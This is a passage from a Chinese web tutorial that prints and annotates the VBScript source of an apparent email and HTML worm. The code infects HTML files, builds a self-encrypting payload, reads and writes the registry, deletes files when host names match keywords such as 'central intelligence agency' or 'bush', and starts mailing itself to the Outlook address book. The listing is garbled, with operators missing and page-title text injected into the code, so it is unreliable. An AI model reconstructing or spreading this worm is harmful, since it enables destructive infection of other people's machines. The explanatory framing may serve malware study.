c语言病毒函数 c语言病毒感染检测( 六 )


if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x"\")
end if
next
if TestUser then Killhe
end sub
sub Gf() ' Get the system paths
' Stores two folder paths in w1 and w2. Neither variable (nor fso) is declared
' in this sub, so they are presumably script-level names defined elsewhere.
' Per the FileSystemObject documentation, GetSpecialFolder(0) is the Windows
' folder and GetSpecialFolder(1) is the System folder.
' NOTE(review): as printed, the operator between the call and the "\" literal
' is missing (apparently lost when the page was extracted), so these two
' lines do not parse as shown.
w1=fso.GetSpecialFolder(0)"\"
w2=fso.GetSpecialFolder(1)"\"
end sub
function Readreg(key_str) ' Read a registry value
' key_str: full registry path of the value to read.
' Returns whatever WScript.Shell.RegRead returns for that path.
' There is no error handling in this function; a failed RegRead propagates to
' the caller unless the caller has "on error resume next" in effect.
' Detection note: the read goes through the WScript.Shell COM object, so the
' registry access is made by whichever process hosts the script.
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
' Release the COM object.
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) ' Write a registry value
' key_str:  full registry path of the value to write.
' Newvalue: data to store.
' vtype:    registry type name passed to RegWrite; an empty string selects the
'           two-argument form, which lets RegWrite use its default type (REG_SZ).
' Declared as a function but never assigns a return value.
' Which keys are written is decided by callers outside this excerpt.
' Detection note: the write goes through WScript.Shell.RegWrite, so it is
' attributed to the script host process rather than to a separate binary.
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
' Release the COM object.
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) ' Build the complete source of the HTML file
' Sbuffer, iHTML: passed through unchanged to MakeScript.
' Returns a string: an HTML/HEAD/TITLE skeleton whose body is MakeScript's output.
' The title is title(ra) with ra drawn at random from 0..6; "title" is defined
' outside this excerpt. Because the title changes per generated file, it is not
' a stable indicator for matching generated files.
' NOTE(review): the listing is damaged here. The operators between adjacent
' terms and the tag delimiters inside the string literals appear to have been
' lost in extraction, and the bracketed Chinese text at the start of the second
' line of the assignment repeats the page title, so it is text injected by the
' hosting site rather than part of the script.
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="""HTML""HEAD""TITLE"title(ra)"/""TITLE""/HEAD"_
【c语言病毒函数 c语言病毒感染检测】"BO""AD"vbcrlfMakeScript(Sbuffer, iHTML)vbcrlf_
"""/BOAD""/HTML"
end Function
function MakeScript(Codestr, iHTML) ' The virus's self-encryption step; fairly complex, so the article does not describe it further
' Codestr: script text to embed. iHTML: selects which of the two forms is built.
' Returns a string holding a SCRIPT block.
'   iHTML true:  a JavaScript block that defines two string variables, jword
'                (from encrypt(Js_Str)) and nword (from Codestr), passes both
'                through unescape(), and then uses document.write() to emit one
'                JavaScript and one VBScript SCRIPT element from them.
'   iHTML false: Codestr wrapped directly in a JavaScript SCRIPT block.
' encrypt and Js_Str are defined outside this excerpt.
' Detection note: in the iHTML form the embedded code is only present as
' escaped string data until run time, so content matching on the script body
' is unlikely to hit; the unescape() followed by document.write() of SCRIPT
' elements is the part that stays constant across copies.
' NOTE(review): operators between adjacent terms and the tag delimiters inside
' the literals appear to have been lost in extraction; the statements below do
' not parse as printed.
if iHTML then
dim DocuWrite
' First document.write call: emits the JavaScript element built from jword.
DocuWrite = "document.write(''+""'SCRIPT Language=JavaScript\n'+"_
"jword""+'\n/'""+'SCRIPT');"
' Second document.write call, appended on a new line: emits the VBScript element built from nword.
DocuWrite = DocuWritevbcrlf"document.write(''+""'SCRIPT Language=VBScript\n'+"_
"nword""+'\n/'""+'SCRIPT');"
' Outer block: variable definitions (chr(34) supplies the quote marks), the two unescape() calls, then DocuWrite.
MakeScript="""SCRIPT Language=JavaScript"vbcrlf"var jword = "_
chr(34)encrypt(Js_Str)chr(34)vbcrlf"var nword = "_
chr(34)Codestrchr(34)vbcrlf"nword = unescape(nword);"vbcrlf_
"jword = unescape(jword);"vbcrlfDocuWritevbcrlf"/""SCRIPT"
else
MakeScript= """SCRIPT Language=JavaScript"Codestr"/""SCRIPT"
end if
end function
function GetScriptCode(Languages) ' Get the code written in a given script language
' Languages: language name to look for; it is compared against the lower-cased
'            Language attribute, so callers must pass it in lower case.
' Returns the Text of the first matching entry in document.scripts, i.e. the
' script reads its own source back out of the page that hosts it. If nothing
' matches, the return value is never assigned.
' For "javascript" an extra length test against 200 is applied first; entries
' that satisfy it fall into the empty "then" branch and are skipped.
' NOTE(review): the comparison operator in that length test is missing from the
' listing, so its direction cannot be determined from this page.
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text) 200 then
' Intentionally empty: this entry is passed over and the loop continues.
else
GetScriptCode = soj.Text
exit function
end if
else
' Any other language: take the first match without a length test.
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
' Convenience wrapper: returns GetScriptCode's result for the "javascript"
' language, i.e. the text of the first JavaScript entry in document.scripts
' that passes GetScriptCode's length test.
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() ' Check whether the current user is a targeted one
' Returns True when the logged-on user name, the computer name or the user
' domain contains one of the keywords below; otherwise False.
' The caller visible earlier in this listing runs Killhe when this returns
' True; Killhe's body is not part of this excerpt.
' Analysis note: the outcome depends on the identity of the host, so a run on a
' machine whose names match no keyword never takes the Killhe path. Dynamic
' analysis on a generically named sandbox will therefore under-report what the
' script does.
' NOTE(review): the InStr(...) tests below have lost their comparison operator
' in extraction and do not parse as printed.
on error resume next
dim keys(6), i, tmpStr, Wnet
' Keywords identifying the targeted users.
' keys(6) reserves seven slots; six are filled, and the loops below scan only
' indexes 0 to 4, so keys(5) ("usa") is never tested.
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") ' create the network object
' The three loops below do the same job: they check whether the user name, the computer name and the domain contain one of the five keywords above. On a match the function returns True, and the files of such users are then deleted.
tmpStr = LCase(Wnet.UserName) ' user name, lower-cased to match the lower-case keywords
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
' Reached only when no keyword matched; the "exit function" paths above skip this release.
Set Wnet = Nothing
end function
function SendMail() '发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件
主题是随机的 , 此过程与“欢乐时光“类似 , 所以不再描述
Randomize
at=fso.GetSpecialFolder(1)"\Readme.html"
